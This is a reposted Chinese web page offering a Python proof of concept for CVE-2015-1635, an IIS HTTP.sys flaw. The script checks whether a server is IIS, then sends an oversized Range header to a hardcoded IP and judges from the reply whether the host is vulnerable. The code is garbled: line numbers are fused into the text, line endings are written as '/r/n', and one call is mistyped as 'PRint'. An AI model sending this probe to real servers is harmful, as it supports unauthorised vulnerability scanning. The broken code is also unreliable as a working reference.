首页 > 学院 > 开发设计 > 正文

cve-2015-1635poc

2019-11-14 17:16:15
字体:
来源:转载
供稿:网友
 1 import socket 2 import random 3 ipAddr = "10.1.89.20" 4 hexAllFfff = "18446744073709551615" 5 req1 = "GET / HTTP/1.0/r/n/r/n" 6 req = "GET / HTTP/1.1/r/nHost: stuff/r/nRange: bytes=0-" + hexAllFfff + "/r/n/r/n" 7 PRint("[*] Audit Started") 8 client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 9 client_socket.connect((ipAddr, 80))10 client_socket.send(req1.encode())11 boringResp = client_socket.recv(1024).decode()12 if "Microsoft" not in boringResp:13                 print("[*] Not IIS")14                 exit(0)15 client_socket.close()16 client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)17 client_socket.connect((ipAddr, 80))18 client_socket.send(req.encode())19 goodResp = client_socket.recv(1024).decode()20 if "Requested Range Not Satisfiable" in goodResp:21                 print("[!!] Looks VULN")22 elif " The request has an invalid header name" in goodResp:23                 print("[*] Looks Patched")24 else:25                 print("[*] Unexpected response, cannot discern patch status")
View Code

这个漏洞则这几天也火了一把,poc附上。


发表评论 共有条评论
用户名: 密码:
验证码: 匿名发表